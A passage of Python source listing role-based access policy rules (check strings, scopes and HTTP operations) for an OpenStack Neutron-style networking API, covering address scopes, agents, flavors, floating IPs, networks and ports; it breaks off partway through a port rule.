base.Rule(
name="network_device",
check_str=("field:port:device_owner=~^network:"),
description="Definition of port with network device_owner",
),
base.Rule(
name="admin_or_data_plane_int",
check_str=("rule:context_is_admin or role:data_plane_integrator"),
description="Rule for data plane integration",
),
base.Rule(
name="restrict_wildcard",
check_str=("(not field:rbac_policy:target_tenant=*) or rule:admin_only"),
description="Definition of a wildcard target_tenant",
),
base.Rule(
name="admin_or_sg_owner",
check_str=("rule:context_is_admin or tenant_id:%(security_group:tenant_id)s"),
description="Rule for admin or security group owner access",
),
base.Rule(
name="admin_owner_or_sg_owner",
check_str=("rule:owner or rule:admin_or_sg_owner"),
description="Rule for resource owner, admin or security group owner access",
),
base.Rule(
name="shared_subnetpools",
check_str=("field:subnetpools:shared=True"),
description="Definition of a shared subnetpool",
),
base.APIRule(
name="get_address_group",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:shared_address_groups"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get an address group",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/address-groups"},
{"method": "GET", "path": "/address-groups/{id}"},
],
),
base.APIRule(
name="create_address_scope",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create an address scope",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/address-scopes"}],
),
base.APIRule(
name="create_address_scope:shared",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a shared address scope",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/address-scopes"}],
),
base.APIRule(
name="get_address_scope",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:shared_address_scopes"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get an address scope",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/address-scopes"},
{"method": "GET", "path": "/address-scopes/{id}"},
],
),
base.APIRule(
name="update_address_scope",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update an address scope",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/address-scopes/{id}"}],
),
base.APIRule(
name="update_address_scope:shared",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``shared`` attribute of an address scope",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/address-scopes/{id}"}],
),
base.APIRule(
name="delete_address_scope",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete an address scope",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/address-scopes/{id}"}],
),
base.APIRule(
name="get_agent",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get an agent",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/agents"},
{"method": "GET", "path": "/agents/{id}"},
],
),
base.APIRule(
name="update_agent",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update an agent",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/agents/{id}"}],
),
base.APIRule(
name="delete_agent",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete an agent",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/agents/{id}"}],
),
base.APIRule(
name="create_dhcp-network",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Add a network to a DHCP agent",
scope_types=["system"],
operations=[{"method": "POST", "path": "/agents/{agent_id}/dhcp-networks"}],
),
base.APIRule(
name="get_dhcp-networks",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List networks on a DHCP agent",
scope_types=["system"],
operations=[{"method": "GET", "path": "/agents/{agent_id}/dhcp-networks"}],
),
base.APIRule(
name="delete_dhcp-network",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Remove a network from a DHCP agent",
scope_types=["system"],
operations=[
{"method": "DELETE", "path": "/agents/{agent_id}/dhcp-networks/{network_id}"},
],
),
base.APIRule(
name="create_l3-router",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Add a router to an L3 agent",
scope_types=["system"],
operations=[{"method": "POST", "path": "/agents/{agent_id}/l3-routers"}],
),
base.APIRule(
name="get_l3-routers",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List routers on an L3 agent",
scope_types=["system"],
operations=[{"method": "GET", "path": "/agents/{agent_id}/l3-routers"}],
),
base.APIRule(
name="delete_l3-router",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Remove a router from an L3 agent",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/agents/{agent_id}/l3-routers/{router_id}"}],
),
base.APIRule(
name="get_dhcp-agents",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List DHCP agents hosting a network",
scope_types=["system"],
operations=[{"method": "GET", "path": "/networks/{network_id}/dhcp-agents"}],
),
base.APIRule(
name="get_l3-agents",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="List L3 agents hosting a router",
scope_types=["system"],
operations=[{"method": "GET", "path": "/routers/{router_id}/l3-agents"}],
),
base.APIRule(
name="get_auto_allocated_topology",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a project's auto-allocated topology",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/auto-allocated-topology/{project_id}"}],
),
base.APIRule(
name="delete_auto_allocated_topology",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a project's auto-allocated topology",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/auto-allocated-topology/{project_id}"}],
),
base.APIRule(
name="get_availability_zone",
check_str=("role:reader and system_scope:all"),
basic_check_str=("@"),
description="List availability zones",
scope_types=["system"],
operations=[{"method": "GET", "path": "/availability_zones"}],
),
base.APIRule(
name="create_flavor",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a flavor",
scope_types=["system"],
operations=[{"method": "POST", "path": "/flavors"}],
),
base.APIRule(
name="get_flavor",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a flavor",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/flavors"},
{"method": "GET", "path": "/flavors/{id}"},
],
),
base.APIRule(
name="update_flavor",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a flavor",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/flavors/{id}"}],
),
base.APIRule(
name="delete_flavor",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a flavor",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/flavors/{id}"}],
),
base.APIRule(
name="create_service_profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a service profile",
scope_types=["system"],
operations=[{"method": "POST", "path": "/service_profiles"}],
),
base.APIRule(
name="get_service_profile",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a service profile",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/service_profiles"},
{"method": "GET", "path": "/service_profiles/{id}"},
],
),
base.APIRule(
name="update_service_profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a service profile",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/service_profiles/{id}"}],
),
base.APIRule(
name="delete_service_profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a service profile",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/service_profiles/{id}"}],
),
base.APIRule(
name="create_flavor_service_profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Associate a flavor with a service profile",
scope_types=["system"],
operations=[{"method": "POST", "path": "/flavors/{flavor_id}/service_profiles"}],
),
base.APIRule(
name="delete_flavor_service_profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Disassociate a flavor with a service profile",
scope_types=["system"],
operations=[
{"method": "DELETE", "path": "/flavors/{flavor_id}/service_profiles/{profile_id}"},
],
),
base.APIRule(
name="create_floatingip",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a floating IP",
scope_types=["project"],
operations=[{"method": "POST", "path": "/floatingips"}],
),
base.APIRule(
name="create_floatingip:floating_ip_address",
check_str=("role:admin and system_scope:all"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a floating IP with a specific IP address",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/floatingips"}],
),
base.APIRule(
name="get_floatingip",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a floating IP",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/floatingips"},
{"method": "GET", "path": "/floatingips/{id}"},
],
),
base.APIRule(
name="update_floatingip",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a floating IP",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/floatingips/{id}"}],
),
base.APIRule(
name="delete_floatingip",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a floating IP",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/floatingips/{id}"}],
),
base.APIRule(
name="get_floatingip_pool",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get floating IP pools",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/floatingip_pools"}],
),
base.APIRule(
name="create_floatingip_port_forwarding",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a floating IP port forwarding",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/floatingips/{floatingip_id}/port_forwardings"}],
),
base.APIRule(
name="get_floatingip_port_forwarding",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a floating IP port forwarding",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/floatingips/{floatingip_id}/port_forwardings"},
{
"method": "GET",
"path": "/floatingips/{floatingip_id}/port_forwardings/{port_forwarding_id}",
},
],
),
base.APIRule(
name="update_floatingip_port_forwarding",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a floating IP port forwarding",
scope_types=["system", "project"],
operations=[
{
"method": "PUT",
"path": "/floatingips/{floatingip_id}/port_forwardings/{port_forwarding_id}",
},
],
),
base.APIRule(
name="delete_floatingip_port_forwarding",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a floating IP port forwarding",
scope_types=["system", "project"],
operations=[
{
"method": "DELETE",
"path": "/floatingips/{floatingip_id}/port_forwardings/{port_forwarding_id}",
},
],
),
base.APIRule(
name="create_router_conntrack_helper",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a router conntrack helper",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/routers/{router_id}/conntrack_helpers"}],
),
base.APIRule(
name="get_router_conntrack_helper",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a router conntrack helper",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/routers/{router_id}/conntrack_helpers"},
{
"method": "GET",
"path": "/routers/{router_id}/conntrack_helpers/{conntrack_helper_id}",
},
],
),
base.APIRule(
name="update_router_conntrack_helper",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a router conntrack helper",
scope_types=["system", "project"],
operations=[
{
"method": "PUT",
"path": "/routers/{router_id}/conntrack_helpers/{conntrack_helper_id}",
},
],
),
base.APIRule(
name="delete_router_conntrack_helper",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:ext_parent_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a router conntrack helper",
scope_types=["system", "project"],
operations=[
{
"method": "DELETE",
"path": "/routers/{router_id}/conntrack_helpers/{conntrack_helper_id}",
},
],
),
base.APIRule(
name="get_loggable_resource",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get loggable resources",
scope_types=["system"],
operations=[{"method": "GET", "path": "/log/loggable-resources"}],
),
base.APIRule(
name="create_log",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a network log",
scope_types=["system"],
operations=[{"method": "POST", "path": "/log/logs"}],
),
base.APIRule(
name="get_log",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a network log",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/log/logs"},
{"method": "GET", "path": "/log/logs/{id}"},
],
),
base.APIRule(
name="update_log",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a network log",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/log/logs/{id}"}],
),
base.APIRule(
name="delete_log",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a network log",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/log/logs/{id}"}],
),
base.APIRule(
name="create_metering_label",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a metering label",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/metering/metering-labels"}],
),
base.APIRule(
name="get_metering_label",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a metering label",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/metering/metering-labels"},
{"method": "GET", "path": "/metering/metering-labels/{id}"},
],
),
base.APIRule(
name="delete_metering_label",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a metering label",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/metering/metering-labels/{id}"}],
),
base.APIRule(
name="create_metering_label_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a metering label rule",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/metering/metering-label-rules"}],
),
base.APIRule(
name="get_metering_label_rule",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a metering label rule",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/metering/metering-label-rules"},
{"method": "GET", "path": "/metering/metering-label-rules/{id}"},
],
),
base.APIRule(
name="delete_metering_label_rule",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a metering label rule",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/metering/metering-label-rules/{id}"}],
),
base.APIRule(
name="create_network",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a network",
scope_types=["project"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:shared",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a shared network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:router:external",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create an external network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:is_default",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``is_default`` attribute when creating a network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:port_security_enabled",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``port_security_enabled`` attribute when creating a network",
scope_types=["project"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:segments",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``segments`` attribute when creating a network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:provider:network_type",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``provider:network_type`` when creating a network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:provider:physical_network",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``provider:physical_network`` when creating a network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="create_network:provider:segmentation_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``provider:segmentation_id`` when creating a network",
scope_types=["system"],
operations=[{"method": "POST", "path": "/networks"}],
),
base.APIRule(
name="get_network",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:shared or rule:external or rule:context_is_advsvc"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a network",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="get_network:router:external",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=("@"),
description="Get ``router:external`` attribute of a network",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="get_network:segments",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``segments`` attribute of a network",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="get_network:provider:network_type",
check_str=("role:reader and system_scope:all"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get ``provider:network_type`` attribute of a network",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="get_network:provider:physical_network",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``provider:physical_network`` attribute of a network",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="get_network:provider:segmentation_id",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``provider:segmentation_id`` attribute of a network",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/networks"},
{"method": "GET", "path": "/networks/{id}"},
],
),
base.APIRule(
name="update_network",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a network",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:segments",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``segments`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:shared",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``shared`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:provider:network_type",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``provider:network_type`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:provider:physical_network",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``provider:physical_network`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:provider:segmentation_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``provider:segmentation_id`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:router:external",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``router:external`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:is_default",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``is_default`` attribute of a network",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="update_network:port_security_enabled",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``port_security_enabled`` attribute of a network",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/networks/{id}"}],
),
base.APIRule(
name="delete_network",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a network",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/networks/{id}"}],
),
base.APIRule(
name="get_network_ip_availability",
check_str=("role:reader and system_scope:all"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get network IP availability",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/network-ip-availabilities"},
{"method": "GET", "path": "/network-ip-availabilities/{network_id}"},
],
),
base.APIRule(
name="create_network_segment_range",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a network segment range",
scope_types=["system"],
operations=[{"method": "POST", "path": "/network_segment_ranges"}],
),
base.APIRule(
name="get_network_segment_range",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a network segment range",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/network_segment_ranges"},
{"method": "GET", "path": "/network_segment_ranges/{id}"},
],
),
base.APIRule(
name="update_network_segment_range",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a network segment range",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/network_segment_ranges/{id}"}],
),
base.APIRule(
name="delete_network_segment_range",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a network segment range",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/network_segment_ranges/{id}"}],
),
base.APIRule(
name="create_port",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:device_owner",
check_str=(
"not rule:network_device or role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:context_is_advsvc or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``device_owner`` attribute when creting a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:mac_address",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``mac_address`` attribute when creating a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:fixed_ips",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:shared"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``fixed_ips`` information when creating a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:fixed_ips:ip_address",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify IP address in ``fixed_ips`` when creating a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:fixed_ips:subnet_id",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:shared"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify subnet ID in ``fixed_ips`` when creating a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:port_security_enabled",
check_str=(
"rule:context_is_advsvc or rule:network_owner or role:admin and system_scope:all or role:admin and project_id:%(project_id)s"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``port_security_enabled`` attribute when creating a port",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:binding:host_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``binding:host_id`` attribute when creating a port",
scope_types=["system"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:binding:profile",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``binding:profile`` attribute when creating a port",
scope_types=["system"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:binding:vnic_type",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``binding:vnic_type`` attribute when creating a port",
scope_types=["project"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:allowed_address_pairs",
check_str=(
"role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``allowed_address_pairs`` attribute when creating a port",
scope_types=["project", "system"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:allowed_address_pairs:mac_address",
check_str=(
"role:admin and system_scope:all or role:admin and project_id:%(project_id)s or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Specify ``mac_address` of `allowed_address_pairs`` attribute when creating a port",
scope_types=["project", "system"],
operations=[{"method": "POST", "path": "/ports"}],
),
base.APIRule(
name="create_port:allowed_address_pairs:ip_address",
check_str=(
